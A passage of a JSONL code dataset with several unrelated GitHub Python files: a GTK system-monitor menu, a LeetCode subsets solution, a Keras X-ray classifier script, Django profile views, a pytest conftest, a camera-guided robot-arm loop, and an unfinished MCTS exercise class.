self.user_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.full_name_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.logged_in_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.uid_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.gid_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.processes_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.home_directory_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.group_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.terminal_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.start_time_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n self.cpu_cb.disconnect_by_func(self.on_add_remove_checkbuttons_toggled)\n\n\n def on_menu_po_show(self, widget):\n \"\"\"\n Run code when customizations menu popover is shown.\n \"\"\"\n \n try:\n self.disconnect_signals()\n except TypeError:\n pass\n self.set_gui()\n self.connect_signals()\n\n\n def on_reset_button_clicked(self, widget):\n \"\"\"\n Reset customizations.\n \"\"\"\n\n # Load default settings\n Config.config_default_users_func()\n Config.config_save_func()\n\n Common.update_tab_and_menu_gui(self, Users)\n\n\n def on_add_remove_checkbuttons_toggled(self, widget):\n \"\"\"\n Run a function for adding/removing columns to treeview.\n \"\"\"\n\n self.add_remove_columns()\n\n\n def set_gui(self):\n \"\"\"\n Set GUI items.\n \"\"\"\n\n # Set GUI objects on Add/Remove Column tab\n if 0 in Config.users_treeview_columns_shown:\n self.user_cb.set_active(True)\n else:\n self.user_cb.set_active(False)\n if 1 in Config.users_treeview_columns_shown:\n self.full_name_cb.set_active(True)\n else:\n self.full_name_cb.set_active(False)\n if 2 in Config.users_treeview_columns_shown:\n self.logged_in_cb.set_active(True)\n else:\n self.logged_in_cb.set_active(False)\n if 3 in Config.users_treeview_columns_shown:\n self.uid_cb.set_active(True)\n else:\n self.uid_cb.set_active(False)\n if 4 in Config.users_treeview_columns_shown:\n self.gid_cb.set_active(True)\n else:\n self.gid_cb.set_active(False)\n if 5 in Config.users_treeview_columns_shown:\n self.processes_cb.set_active(True)\n else:\n self.processes_cb.set_active(False)\n if 6 in Config.users_treeview_columns_shown:\n self.home_directory_cb.set_active(True)\n else:\n self.home_directory_cb.set_active(False)\n if 7 in Config.users_treeview_columns_shown:\n self.group_cb.set_active(True)\n else:\n self.group_cb.set_active(False)\n if 8 in Config.users_treeview_columns_shown:\n self.terminal_cb.set_active(True)\n else:\n self.terminal_cb.set_active(False)\n if 9 in Config.users_treeview_columns_shown:\n self.start_time_cb.set_active(True)\n else:\n self.start_time_cb.set_active(False)\n if 10 in Config.users_treeview_columns_shown:\n self.cpu_cb.set_active(True)\n else:\n self.cpu_cb.set_active(False)\n\n\n def add_remove_columns(self):\n \"\"\"\n Add/Remove columns to treeview.\n \"\"\"\n\n Config.users_treeview_columns_shown = []\n\n if self.user_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(0)\n if self.full_name_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(1)\n if self.logged_in_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(2)\n if self.uid_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(3)\n if self.gid_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(4)\n if self.processes_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(5)\n if self.home_directory_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(6)\n if self.group_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(7)\n if self.terminal_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(8)\n if self.start_time_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(9)\n if self.cpu_cb.get_active() == True:\n Config.users_treeview_columns_shown.append(10)\n\n # Apply changes immediately (without waiting update interval).\n Common.treeview_column_order_width_row_sorting(None, None, Users)\n\n Common.save_tab_settings(Users)\n\n\nUsersMenu = UsersMenu()\n\n","repo_name":"hakandundar34coding/system-monitoring-center","sub_path":"src/UsersMenu.py","file_name":"UsersMenu.py","file_ext":"py","file_size_in_byte":10413,"program_lang":"python","lang":"en","doc_type":"code","stars":849,"dataset":"github-code","pt":"48"} +{"seq_id":"44268432642","text":"# 子集。这个题目主要的思路点在于,对每一次的数组递归除最后一位外的其他位,然后将所有结果*2,一部分加上新的最后一位,另一部分不变\n# 最后,在加上空集即可。\nclass Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n import copy\n result = self.func(nums)\n return result+[[]]\n\n def func(self,nums):\n if len(nums)<=1:\n return [nums]\n \n now = nums[-1]\n pre = self.func(nums[:len(nums)-1])\n pre_now = copy.deepcopy(pre)\n for i in pre_now:\n i += [now]\n return pre+pre_now+[[now]]","repo_name":"whywhs/Leetcode","sub_path":"Leetcode78_M.py","file_name":"Leetcode78_M.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25066069386","text":"from __future__ import absolute_import, division, print_function\n\nfrom os import environ, getcwd\nfrom os.path import join\n\nimport shutil\nimport re\nimport os\nimport argparse\nimport keras\nimport numpy as np\nimport pandas as pd\nimport sklearn as skl\nimport tensorflow as tf\nfrom keras.applications.vgg19 import VGG19\nfrom keras.applications import DenseNet169, InceptionResNetV2, DenseNet201\nfrom keras.applications import NASNetMobile\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.metrics import binary_accuracy, binary_crossentropy, kappa_error\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom custom_layers import *\nfrom mura import Mura\n\npd.set_option('display.max_rows', 20)\npd.set_option('precision', 4)\nnp.set_printoptions(precision=4)\n\nenviron['TF_CPP_MIN_LOG_LEVEL'] = '2' # Shut up tensorflow!\nprint(\"tf : {}\".format(tf.__version__))\nprint(\"keras : {}\".format(keras.__version__))\nprint(\"numpy : {}\".format(np.__version__))\nprint(\"pandas : {}\".format(pd.__version__))\nprint(\"sklearn : {}\".format(skl.__version__))\n\n# Hyper-parameters / Globals\nBATCH_SIZE = 4 # tweak to your GPUs capacity\nIMG_HEIGHT = 420 # ResNetInceptionv2 & Xception like 299, ResNet50/VGG/Inception 224, NASM 331\nIMG_WIDTH = IMG_HEIGHT\nCHANNELS = 3\nDIMS = (IMG_HEIGHT, IMG_WIDTH, CHANNELS) # blame theano\nMODEL_TO_EVAL1 = './models/DenseNet169_420_HUMERUS.hdf5'\nMODEL_TO_EVAL2 = './models/DenseNet169_420_HAND.hdf5'\nMODEL_TO_EVAL3 = './models/DenseNet169_420_FINGER.hdf5'\nMODEL_TO_EVAL4 = './models/DenseNet169_420_FOREARM.hdf5'\nMODEL_TO_EVAL5 = './models/DenseNet169_420_ELBOW.hdf5'\nMODEL_TO_EVAL6 = './models/DenseNet169_420_SHOULDER.hdf5'\nMODEL_TO_EVAL7 = './models/DenseNet169_420_WRIST.hdf5'\nMODEL_TO_EVAL8 = './models/DenseNet169_420_NEW_HIST.hdf5'\nDATA_DIR = 'data_val/'\nEVAL_CSV = 'valid.csv'\nEVAL_DIR = 'data/val/'\n\nparser = argparse.ArgumentParser(description='Input Path')\nparser.add_argument('input_filename',default='valid_image_paths.csv', type=str)\nparser.add_argument('output_path', default='prediction.csv', type=str)\nproc_data_dir = join(os.getcwd(), 'data/val/')\nproc_train_dir = join(proc_data_dir, 'train')\nproc_val_dir = join(proc_data_dir, 'val')\n\n\nclass ImageString(object):\n _patient_re = re.compile(r'patient(\\d+)')\n _study_re = re.compile(r'study(\\d+)')\n _image_re = re.compile(r'image(\\d+)')\n _study_type_re = re.compile(r'XR_(\\w+)')\n\n def __init__(self, img_filename):\n\n self.img_filename = img_filename\n self.patient = self._parse_patient()\n self.study = self._parse_study()\n self.image_num = self._parse_image()\n self.study_type = self._parse_study_type()\n self.image = self._parse_image()\n self.normal = self._parse_normal()\n self.valid = self._parse_valid()\n\n\n def flat_file_name(self):\n return \"{}_{}_patient{}_study{}_{}_image{}.png\".format(self.valid, self.study_type, self.patient, self.study,\n self.normal, self.image)\n\n def _parse_patient(self):\n return int(self._patient_re.search(self.img_filename).group(1))\n\n def _parse_study(self):\n return int(self._study_re.search(self.img_filename).group(1))\n\n def _parse_image(self):\n return int(self._image_re.search(self.img_filename).group(1))\n\n def _parse_study_type(self):\n return self._study_type_re.search(self.img_filename).group(1)\n\n def _parse_normal(self):\n return \"normal\" if (\"negative\" in self.img_filename) else \"abnormal\"\n\n def _parse_normal_label(self):\n return 1 if(\"negative\" in self.img_filename) else 0\n\n def _parse_valid(self):\n return \"valid\" if (\"valid\" in self.img_filename) else \"test\"\n\ndef preprocess_img(img):\n # Histogram normalization in v channel\n hsv = color.rgb2hsv(img)\n hsv[:, :, 2] = exposure.equalize_hist(hsv[:, :, 2])\n img = color.hsv2rgb(hsv)\n\n # central square crop\n min_side = min(img.shape[:-1])\n centre = img.shape[0] // 2, img.shape[1] // 2\n img = img[centre[0] - min_side // 2:centre[0] + min_side // 2,\n centre[1] - min_side // 2:centre[1] + min_side // 2,\n :]\n\n # rescale to standard size\n img = transform.resize(img, (IMG_SIZE, IMG_SIZE))\n\n # roll color axis to axis 0\n img = np.rollaxis(img, -1)\n\n return img\n\ndef eval(args=None):\n\n args= parser.parse_args()\n\n # load up our csv with validation factors\n data_dir = join(getcwd(), DATA_DIR)\n eval_csv = join(data_dir, EVAL_CSV)\n\n true_labels=[]\n\n ###########################################\n df = pd.read_csv(args.input_filename, names=['img', 'label'], header=None)\n samples = [tuple(x) for x in df.values]\n # for img, label in samples:\n # #assert (\"negative\" in img) is (label is 0)\n # enc = ImageString(img)\n # true_labels.append(enc._parse_normal_label())\n # cat_dir = join(proc_val_dir, enc.normal)\n # if not os.path.exists(cat_dir):\n # os.makedirs(cat_dir)\n # shutil.copy2(enc.img_filename, join(cat_dir, enc.flat_file_name()))\n\n\n ###########################################\n\n eval_datagen = ImageDataGenerator(rescale=1./255\n# , histogram_equalization=True\n )\n eval_generator = eval_datagen.flow_from_directory(\n EVAL_DIR, class_mode='binary', shuffle=False,target_size=(IMG_HEIGHT, IMG_WIDTH), batch_size=BATCH_SIZE)\n n_samples = eval_generator.samples\n base_model = DenseNet169(input_shape=DIMS, weights='imagenet', include_top=False) #weights='imagenet'\n x = base_model.output\n x = GlobalAveragePooling2D(name='avg_pool')(x) # comment for RESNET\n # x = WildcatPool2d()(x)\n\n x = Dense(1, activation='sigmoid', name='predictions')(x)\n model = Model(inputs=base_model.input, outputs=x)\n model.load_weights(MODEL_TO_EVAL8)\n model.compile(optimizer=Adam(lr=1e-3)\n , loss=binary_crossentropy\n# , loss=kappa_error\n , metrics=['binary_accuracy'])\n score, acc = model.evaluate_generator(eval_generator, n_samples / BATCH_SIZE)\n print(model.metrics_names)\n print('==> Metrics with eval')\n print(\"loss :{:0.4f} \\t Accuracy:{:0.4f}\".format(score, acc))\n y_pred = model.predict_generator(eval_generator, n_samples / BATCH_SIZE)\n\n# print(y_pred)\n# df_filenames = pd.Series(np.array(eval_generator.filenames), name='filenames')\n# df_classes = pd.Series(np.array(y_pred), name='classes')\n\n# prediction_data = pd.concat([df_filenames, df_classes,])\n# prediction_data.to_csv(args.output_path + \"/prediction.csv\")\n\n mura = Mura(eval_generator.filenames, y_true = eval_generator.classes, y_pred1=y_pred, y_pred2=y_pred, y_pred3=y_pred, y_pred4= y_pred, y_pred5= y_pred, output_path= args.output_path)\n print(mura.metrics_by_encounter())\n\n\nif __name__ == '__main__':\n eval()\n","repo_name":"ynswon/MURA","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":6980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28718153267","text":"from django.core.urlresolvers import reverse_lazy\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom .models import InfusionsoftProfile, UserProfile, UserPrivateProfile\nfrom .forms import UserProfileForm, UserPrivateProfileForm\n\n\n@login_required\ndef update_infusionsoft_tags(request):\n '''\n updates users tags with infusionsofts\n '''\n redirect = request.GET.get('next') if request.GET.get('next') else reverse_lazy(\"users:redirect\")\n\n profile = InfusionsoftProfile.objects.get_or_create(user=request.user)[0]\n profile.update_tags()\n\n return HttpResponseRedirect(redirect)\n\n@login_required\ndef update_user_profile(request):\n user_profile = UserProfile.objects.get_or_create(user=request.user)[0]\n form = UserProfileForm(instance=user_profile)\n if request.method == 'POST':\n form = UserProfileForm(request.POST, instance=user_profile)\n if form.is_valid:\n form.save()\n return HttpResponseRedirect(reverse_lazy(\"users:detail\", \n kwargs={\"pk\": request.user.pk}))\n context = {'form': form}\n return render_to_response(\"profiles/edit.html\", context, \n context_instance=RequestContext(request))\n\n\n@login_required\ndef update_user_private_profile(request):\n user_profile = UserPrivateProfile.objects.get_or_create(user=request.user)[0]\n form = UserPrivateProfileForm(instance=user_profile)\n if request.method == 'POST':\n form = UserPrivateProfileForm(request.POST, instance=user_profile)\n if form.is_valid:\n form.save()\n return HttpResponseRedirect(reverse_lazy(\"users:detail\", \n kwargs={\"pk\": request.user.pk}))\n context = {'form': form}\n return render_to_response(\"profiles/edit.html\", context, \n context_instance=RequestContext(request))\n\n","repo_name":"WebPowerLabs/django-trainings","sub_path":"dtf/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20640080639","text":"import os\nimport sys\n\nimport cv2\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\nfrom radical_analysis_tool.radical_analysis_mainwindow import Ui_MainWindow\nfrom utils.Functions import creatBlankRGBImageWithSize, rgb2qimage, get_3_point_water_radical_img, drawline\n\n\nclass RadicalAnalysisGUI(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super(RadicalAnalysisGUI, self).__init__()\n self.setupUi(self)\n\n self.open_pushButton.clicked.connect(self.handle_open_button)\n self.analyze_pushButton.clicked.connect(self.handle_analyze_button)\n self.a_listWidget.itemClicked.connect(self.handle_a_list_widgt_item_click)\n self.b_listWidget.itemClicked.connect(self.handle_b_list_widgt_item_click)\n\n self.merged_scene = QGraphicsScene()\n self.merged_scene.setBackgroundBrush(Qt.gray)\n self.merged_graphicsView.setScene(self.merged_scene)\n self.merged_scene.setSceneRect(QRectF())\n self.merged_graphicsView.fitInView(self.merged_scene.sceneRect(), Qt.KeepAspectRatio)\n\n self.a_scene = QGraphicsScene()\n self.a_scene.setBackgroundBrush(Qt.gray)\n self.a_graphicsView.setScene(self.a_scene)\n self.a_scene.setSceneRect(QRectF())\n self.a_graphicsView.fitInView(self.a_scene.sceneRect(), Qt.KeepAspectRatio)\n\n self.b_scene = QGraphicsScene()\n self.b_scene.setBackgroundBrush(Qt.gray)\n self.b_graphicsView.setScene(self.b_scene)\n self.b_scene.setSceneRect(QRectF())\n self.b_graphicsView.fitInView(self.b_scene.sceneRect(), Qt.KeepAspectRatio)\n\n\n self.image_path = \"\"\n\n self.a_image = None\n self.b_image = None\n\n\n def handle_open_button(self):\n print(\"open clicked\")\n self.image_path = str(QFileDialog.getExistingDirectory(self, \"Select Directory\"))\n\n image_names = [f for f in os.listdir(self.image_path) if \".png\" in f or \".jpg\" in f or \".jpeg\" in f]\n for i in range(len(image_names)):\n item_a = QListWidgetItem(image_names[i])\n self.a_listWidget.addItem(item_a)\n item_b = QListWidgetItem(image_names[i])\n self.b_listWidget.addItem(item_b)\n\n def handle_analyze_button(self):\n print(\"analyze clicked\")\n\n if self.a_image is None or self.b_image is None:\n print(\"a image or b image is none\")\n return\n\n a_radical = get_3_point_water_radical_img(self.a_image)\n b_radical = get_3_point_water_radical_img(self.b_image)\n\n if a_radical is None or b_radical is None:\n print(\"a or b radical is none\")\n return\n\n bk_rgb = creatBlankRGBImageWithSize(self.a_image.shape)\n\n # draw mizi grid\n drawline(bk_rgb, (0,0), (bk_rgb.shape[0]-1, bk_rgb.shape[1]-1), (0, 0, 255), 1, gap=4)\n drawline(bk_rgb, (0, bk_rgb.shape[1] - 1), (bk_rgb.shape[0] - 1, 0), (0, 0, 255), 1, gap=4)\n drawline(bk_rgb, (0, int(bk_rgb.shape[1]/2)), (bk_rgb.shape[0]-1, int(bk_rgb.shape[1]/2)), (0, 0, 255), 1, gap=4)\n drawline(bk_rgb, (int(bk_rgb.shape[0]/2), 0), (int(bk_rgb.shape[0]/2), bk_rgb.shape[1] - 1), (0, 0, 255), 1, gap=4)\n\n\n for x in range(self.a_image.shape[0]):\n for y in range(self.a_image.shape[1]):\n if a_radical[x][y] == 0 and b_radical[x][y] == 0:\n bk_rgb[x][y] = (0, 0, 0) # black\n if a_radical[x][y] == 0 and b_radical[x][y] != 0:\n bk_rgb[x][y] = (0, 0, 255) # red\n if a_radical[x][y] != 0 and b_radical[x][y] == 0:\n bk_rgb[x][y] = (0, 255, 0) # green\n\n qimg = rgb2qimage(bk_rgb)\n qimg_pix = QPixmap.fromImage(qimg)\n\n self.merged_scene.addPixmap(qimg_pix)\n self.merged_scene.setSceneRect(QRectF())\n self.merged_graphicsView.fitInView(self.merged_scene.sceneRect(), Qt.KeepAspectRatio)\n self.merged_scene.update()\n\n def handle_a_list_widgt_item_click(self, item):\n print(\"item b clicked\")\n img_name = item.text().strip()\n img_path = os.path.join(self.image_path, img_name)\n if not os.path.exists(img_path):\n print(\"not a image found!\")\n return\n\n self.a_image = cv2.imread(img_path, 0)\n\n a_qimg = QImage(img_path)\n a_qimg_pix = QPixmap.fromImage(a_qimg)\n # self.a_scene.addPixmap(a_qimg_pix)\n self.a_scene.addPixmap(a_qimg_pix)\n self.a_scene.setSceneRect(QRectF())\n self.a_graphicsView.fitInView(self.a_scene.sceneRect(), Qt.KeepAspectRatio)\n self.a_scene.update()\n\n def handle_b_list_widgt_item_click(self, item):\n print(\"item b clicked\")\n img_name = item.text().strip()\n img_path = os.path.join(self.image_path, img_name)\n if not os.path.exists(img_path):\n print(\"not a image found!\")\n return\n\n self.b_image = cv2.imread(img_path, 0)\n\n b_qimg = QImage(img_path)\n b_qimg_pix = QPixmap.fromImage(b_qimg)\n # self.b_scene.addPixmap(b_qimg_pix)\n self.b_scene.addPixmap(b_qimg_pix)\n self.b_scene.setSceneRect(QRectF())\n self.b_graphicsView.fitInView(self.b_scene.sceneRect(), Qt.KeepAspectRatio)\n self.b_scene.update()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n MainWindow = RadicalAnalysisGUI()\n MainWindow.show()\n sys.exit(app.exec_())\n\n\n\n\n\n # img_path = \"./temp/瀛.png\"\n #\n # threshold = 1. / 4\n #\n # img = cv2.imread(img_path, 0)\n #\n # bk = get_3_point_water_radical_img(img)\n #\n # # rects = getAllMiniBoundingBoxesOfImage(img)\n # # print(len(rects))\n #\n # # cv2.line(img, (int(threshold*img.shape[0]), 0), (int(threshold*img.shape[0]), img.shape[1]), 0, 2 )\n # #\n # # for rect in rects:\n # # cent_x = rect[0] + int(rect[2] / 2)\n # #\n # # if cent_x <= threshold * img.shape[1]:\n # # cv2.rectangle(img, (rect[0], rect[1]), (rect[0]+rect[2], rect[1]+rect[3]), 0, 2)\n #\n #\n #\n #\n # cv2.imshow(\"1\", bk)\n #\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()","repo_name":"plateaukao/CSInTraditionalChineseCalligraphy","sub_path":"radical_analysis_tool/radical_analysis_gui.py","file_name":"radical_analysis_gui.py","file_ext":"py","file_size_in_byte":6120,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"8589181924","text":"\"\"\"\nin order to share your fixtures across your entire module, py.test \nsuggests you define all your fixtures within one single conftest.py file.\n~ https://gist.github.com/peterhurford/09f7dcda0ab04b95c026c60fa49c2a68\n\nAdditionally, they do not need to be imported in tests that depend on them.\nJust use by name.\n\"\"\"\nimport logging\n\nimport pytest\nfrom grapl_tests_common.clients.grapl_web_client import GraplWebClient\n\n\n@pytest.fixture(\n # Reuse the same actix session for the entire test run session.\n # (yes, two unrelated uses of 'session')\n scope=\"session\"\n)\ndef actix_session() -> str:\n return GraplWebClient().get_actix_session()\n\n\n# Applies it to every test function automatically.\n@pytest.fixture(scope=\"function\", autouse=True)\ndef set_noisy_loggers_to_log_level_info(caplog: pytest.LogCaptureFixture) -> None:\n # We globally declare every logger should use DEBUG in `exec_pytest`,\n # and here we piecemeal set some of the less useful loggers to a\n # different level.\n\n # Ideally we'd be able to do this with a regex or something - I've opened a\n # discussion here: https://github.com/pytest-dev/pytest/discussions/8925\n logger_names = (\n \"botocore.auth\",\n \"botocore.endpoint\",\n \"botocore.hooks\",\n \"botocore.loaders\",\n \"botocore.parsers\",\n \"botocore.retryhandler\",\n \"urllib3.connectionpool\",\n )\n for logger_name in logger_names:\n caplog.set_level(logging.INFO, logger=logger_name)\n","repo_name":"macasieb/grapl","sub_path":"src/python/e2e-test-runner/e2e_test_runner/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"7810703996","text":"# import the necessary packages\nprint(\"beginning execution\")\nimport grip\nimport time\nimport cv2 as cv\nimport pyrealsense2 as rs\nimport numpy as np\nimport altusi.visualizer as vis\nimport robot\nimport ikpy\nprint(\"libraries imported\")\n\ngp = grip.GripPipeline()\nprint(\"grip instantiated\")\n\nSEARCH_LR = 0\nALIGN_UD = 1\nIK = 2\nGRAB = 3\nHOME = 4\n\nstage = 0\ntracking = 0\n\nmy_chain = ikpy.chain.Chain.from_urdf_file(\"./niryo_one.urdf\")\n\n#object_detector = ObjectDetector()\n\nhome_pin = 13 #GPIO pin connected to set home switch\ndelay = 1.2 # seconds\nangle = 2 #degrees\n\nxlen = 640\nylen = 480\n\nx_center = xlen / 2\ny_center = ylen / 2\n\nx_range_low = x_center - 20\nx_range_high = x_center + 20\ny_range_low = y_center - 20\ny_range_high = y_center + 20\n\n# initialize the camera and grab a reference to the raw camera capture\nprint(\"loading camera\")\npipeline = rs.pipeline()\nconfig = rs.config()\nconfig.enable_stream(rs.stream.depth, xlen, ylen, rs.format.z16, 30)\nconfig.enable_stream(rs.stream.color, xlen, ylen, rs.format.bgr8, 30)\npipeline.start(config)\nprint(\"camera loaded\")\n\n# allow the camera to warmup\ntime.sleep(0.1)\n\n#instantiate robot\nprint(\"instantiating robot\")\nmy_robot = robot.Robot()\nmy_robot.goReady()\nprint(\"robot went home\")\n\n#call back function for GPIO interrupt\ndef home_pressed(channel):\n print(\"HOME PRESSED\")\n my_robot.resetHome()\n \n\n# capture frames from the camera\n_start_t = time.time()\nstart_time = 0\nwhile True:\n _prx_t = time.time() - _start_t\n _start_t = time.time()\n frames = pipeline.wait_for_frames()\n color_frame = frames.get_color_frame()\n depth_frame = frames.get_depth_frame()\n frm = np.asanyarray(color_frame.get_data())\n _start_t = time.time()\n time.sleep(0.01)\n gp.process(frm)\n bboxes = gp.filter_contours_output\n #scores, bboxes = object_detector.getObjects(frm, def_score=0.4)\n \n\n \n if len(bboxes) > 0 and (time.time() - start_time) > delay:\n tracking = 1\n target = bboxes[0]\n x1, y1, w, h = target\n \n x2 = x1 + w\n y2 = y1 + h\n \n w = x2 - x1\n h = y2 - y1\n \n xmid = int((x1 + x2) /2)\n ymid = int((y1 + y2) /2)\n \n z = depth_frame.get_distance(xmid, ymid)\n increment = 5 \n \n if stage == SEARCH_LR:\n if (xmid < x_range_low):\n print(\"move LEFT\")\n my_robot.moveLR(increment)\n\n my_robot.writeJSON()\n elif (xmid > x_range_high):\n print(\"move RIGHT\")\n my_robot.moveLR(-1 * increment)\n my_robot.writeJSON()\n else:\n print(\"DO NOT MOVE, in the middle X\")\n stage = ALIGN_UD\n continue\n if stage == ALIGN_UD:\n if (ymid < y_range_low):\n print(\"move UP\")\n my_robot.moveUD(increment)\n my_robot.writeJSON()\n elif (ymid > y_range_high):\n print(\"move DOWN\")\n my_robot.moveUD(-1 * increment)\n my_robot.writeJSON()\n else:\n print(\"DO NOT MOVE, in the middle Y\")\n stage = IK\n continue\n if stage == IK:\n pose = my_robot.current_pose[:8]\n pose[1] = 0\n pose[4] = 0\n pose[6] = 0\n pose[7] = 0\n current_position_frame = my_chain.forward_kinematics(pose)\n cyl_x = real_frame[:3,3][0]\n cyl_z = real_frame[:3,3][2]\n\n \n target_vector = [cyl_x + z ,0, cyl_z]\n target_frame = np.eye(4)\n target_frame[:3, 3] = target_vector\n target_angles = my_chain.inverse_kinematics(target_frame)\n target_pose = [my_robot.current_pose[1],target_angles[2],target_angles[3],0,target_angles[5],0,45]\n my_robot.setPose(target_pose)\n time.sleep(4)\n stage = GRAB\n continue\n if stage == GRAB:\n my_robot.moveGrab(-30)\n time.sleep(2)\n stage = HOME\n continue\n if stage == HOME:\n my_robot.goReady()\n time.sleep(4)\n stage = SEARCH_LR\n tracking = 0\n continue\n \n start_time = time.time()\n \n elif (len(bboxes) == 0) and (time.time() - start_time) > delay:\n tracking = 0\n stage = SEARCH_LR\n #go home call\n my_robot.goReady()\n print(\"go home,cant see anything\")\n start_time = time.time()\n \n if len(bboxes):\n frm = vis.plotBBoxes(frm, [(x,y,x+w,y+h) for x,y,w,h in bboxes], len(bboxes) * ['strawberry'], len(bboxes)*[0])\n frm = vis.plotInfo(frm, 'Raspberry Pi - FPS: {:.3f}'.format(1/_prx_t))\n frm = cv.cvtColor(np.asarray(frm), cv.COLOR_BGR2RGB)\n\n # show the frame\n cv.imshow(\"Frame\", frm)\n cv.imwrite(\"../Frontend/frame.jpg\", frm)\n \n key = cv.waitKey(1)\n if key in [27, ord('q')]:\n break\n #time.sleep(2)\n \npipeline.stop()\n","repo_name":"darisoy/RobotArm","sub_path":"pi-dyna-test-env/gripRunner.py","file_name":"gripRunner.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42018844884","text":"import numpy as np\n\nfrom MCTSAgent.Edge import Edge\nfrom MCTSAgent.Node import Node\nfrom connect4.Game import GameState, GRID_SHAPE\n\nEPSILON = 0.2\nALPHA = 0.8\n\n\ndef computeU(N, P, epsilon, nu, action, sumN):\n U = ((1 - epsilon) * P + epsilon * nu[action]) * np.sqrt(sumN) / (1 + N)\n return U\n\n\nclass MCTS():\n\n def __init__(self, root, cpuct, model, debug=False):\n self.root = root\n # self.nodes_dict is not reset when we change the root of the tree, in order to be able to recover\n # already computed nodes, if the new tree extends to these nodes\n self.nodes_dict = {}\n # As per the cheatsheet: during the selection phase of the MCTS, the tree starts from the root\n # and choses the node which has the maximum value for Q+U, until it reaches a leaf.\n # Q is equal to the mean value of the next state. At the beginning, Q is totally wrong, but after\n # some time, it becomes more and more accurate.\n # U is a function of P (prior proba of selecting the move) and N (number of visits), that increases\n # if the move has not been explored much (ie. if N is small compared to the N of the other moves),\n # or if the prior probability of the action is high. It is also mitigated by cpuct: U = cpuct * function(P, N)\n # Therefore, if cpuct is high, U will keep on being more important than Q, even during the latest\n # stages, and exploration will keep on being favored, rather than exploitation of Q\n self.cpuct = cpuct\n # Model used to evaluate the leaves, each time the selection phase reaches a leaf of the tree.\n # It can be whatever we want: something totally random, a neural network...\n # It just must contain a method predict(self, board) which predicts V (value of the board)\n # and P (probabilies of the actions in this board state)\n self.model = model\n self.debug = debug\n self.addNode(root)\n\n def simulate(self):\n \"\"\"Main function of the MCTS: does one simulation, ie. evaluates and expands the most promising leaf of the tree\n - selection: choses the most promising leaf (step 1 of the cheat sheet)\n - evaluate it: evaluates the allowed actions from this leaf, appends the corresponding nodes to the tree (step 2)\n - backfill the tree with the value of the leaf (step 3)\n \"\"\"\n\n if self.debug:\n state = GameState.from_id(self.root.state_id, GRID_SHAPE)\n print('ROOT NODE...%s', self.root.state_id)\n print(state)\n print('CURRENT PLAYER...%d', state.currentPlayer)\n\n ##### MOVE THE LEAF NODE\n ## YOUR CODE HERE: move to a leaf (call one of the functions below)\n leaf, value, done, breadcrumbs = self.moveToLeaf()\n if self.debug:\n state = GameState.from_id(leaf.state_id, GRID_SHAPE)\n print(state)\n\n ##### EXPAND THE LEAF NODE\n ## YOUR CODE HERE: expand the leaf (call one of the functions below)\n self.expandLeaf(leaf, done)\n\n ##### BACKFILL THE VALUE THROUGH THE TREE\n ## YOUR CODE HERE: backfill the value (call one of the functions below)\n self.backFill(leaf, value, breadcrumbs)\n\n def moveToLeaf(self):\n \"\"\"Goes down the tree until reaches the 'most promising leaf'\"\"\"\n\n if self.debug:\n print('------MOVING TO LEAF------')\n\n # list of the edges from the root to the leaf\n breadcrumbs = []\n currentNode = self.root\n\n done = False\n value = 0\n\n while not currentNode.isLeaf():\n\n if currentNode == self.root:\n epsilon = EPSILON\n nu = np.random.dirichlet([ALPHA] * len(currentNode.edges))\n else:\n epsilon = 0\n nu = [0] * len(currentNode.edges)\n ## YOUR CODE HERE: find the best next node, ie. the one which edge has the biggest Q + U\n ## Hint: each edge of the current node has Q = edge.stats['Q'], P = edge.stats['P'] and N = edge.stats['N']\n ## => you have to find the edge which maximizes Q+U, because that one is pointing out to the best next node\n ## NB: currentNode.edges returns a list of (action, edge), you have to iterate over that list\n ## For each edge: Q is directly found above, U is more complex, you have to compute it\n ## 1) see the comment in __init__(): U = self.cpuct * function(P, N)\n ## 2) basically, function(P, N) = P * 